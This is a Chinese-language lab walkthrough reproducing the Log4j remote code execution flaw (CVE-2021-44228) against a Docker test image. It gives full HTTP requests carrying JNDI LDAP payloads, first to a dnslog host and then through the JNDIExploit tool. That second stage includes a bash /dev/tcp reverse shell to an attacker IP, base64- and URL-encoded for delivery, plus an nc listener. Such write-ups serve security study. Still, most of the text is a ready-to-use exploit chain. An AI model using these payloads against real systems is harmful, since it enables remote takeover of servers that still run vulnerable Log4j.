(CVE-2021-44228)Apache log4j 远程命令执行
漏洞简介
Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)。
Apache Log4j2远程代码执行漏洞由Lookup功能引发。Log4j2在默认情况下会开启Lookup功能,用于将特殊值添加到日志中。此功能中也支持对JNDI的Lookup,但由于Lookup对于加载的JNDI内容未做任何限制,使得攻击者可以通过JNDI注入实现远程加载恶意类到应用中,从而造成RCE(远程代码执行)。
影响版本
Apache Log4j 2.x < 2.15.0-rc2
环境搭建
docker pull vulfocus/log4j2-rce-2021-12-09 #拉取漏洞镜像
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wJ5jyPG0-1639919975004)(log4j_rce.assets/image-20211219064800396.png)]](https://images2.imgbox.com/19/ef/6J3XFGrU_o.png)
docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 #开启环境
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JwyHNW53-1639919975006)(log4j_rce.assets/image-20211219064939550.png)]](https://images2.imgbox.com/cf/70/6IQxF3Ph_o.png)
漏洞复现
dnslog回显
访问:http://192.168.99.100:38080/hello
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-00TUYBWB-1639919975006)(log4j_rce.assets/image-20211219065150373.png)]](https://images2.imgbox.com/4e/57/PknVxjlX_o.png)
使用 BurpSuite 抓包:
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eu9z9JTW-1639919975007)(log4j_rce.assets/image-20211219065228161.png)]](https://images2.imgbox.com/62/76/XZWTWbL0_o.png)
右键改变请求方法:
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xCpsE8Fn-1639919975008)(log4j_rce.assets/image-20211219065333100.png)]](https://images2.imgbox.com/0e/69/LsddaVd0_o.png)
请求包变为:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Payload:${jndi:ldap://xxx.dnslog.cn/exp}
本次使用为:${jndi:ldap://29l3ni.dnslog.cn/exp}
加到请求包中:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
payload=${jndi:ldap://29l3ni.dnslog.cn/exp}
点击send,查看 dnslog 回显:
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-d2iMoPSL-1639919975009)(log4j_rce.assets/image-20211219065714279.png)]](https://images2.imgbox.com/a8/3c/6MQAfy47_o.png)
成功回显,说明存在漏洞。
反弹shell
使用工具:https://github.com/zzwlpx/JNDIExploit.git
kali下载:
git clone https://github.com/zzwlpx/JNDIExploit.git
执行命令,开启服务:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.99.121 #攻击机ip
反弹shell命令:
bash -i >& /dev/tcp/192.169.99.121/4444 0>&1
初始请求包:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
payload格式 :${jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/[反弹shell命令的变形]}
变形1:base64编码:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA+JjE=
变形2:url编码:(注:这里url编码要选择URL-encode key characters)
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%2bJjE%3d
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4Kq7Io4e-1639919975010)(log4j_rce.assets/image-20211219074518448.png)]](https://images2.imgbox.com/1e/07/o72hAWFA_o.png)
变形3:再进行一次url编码:(注:这里url编码要选择URL-encode key characters)
YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d
将payload加到请求包中变为:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
payload=${jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d}
开启监听
nc -lvvp 4444
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DbZbIH1L-1639919975011)(log4j_rce.assets/image-20211219075614304.png)]](https://images2.imgbox.com/6c/46/cMOuS8JP_o.png)
点击send
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UISH4KTr-1639919975011)(log4j_rce.assets/image-20211219080157313.png)]](https://images2.imgbox.com/fc/7d/2KE31X56_o.png)
成功反弹shell!
仅供学习!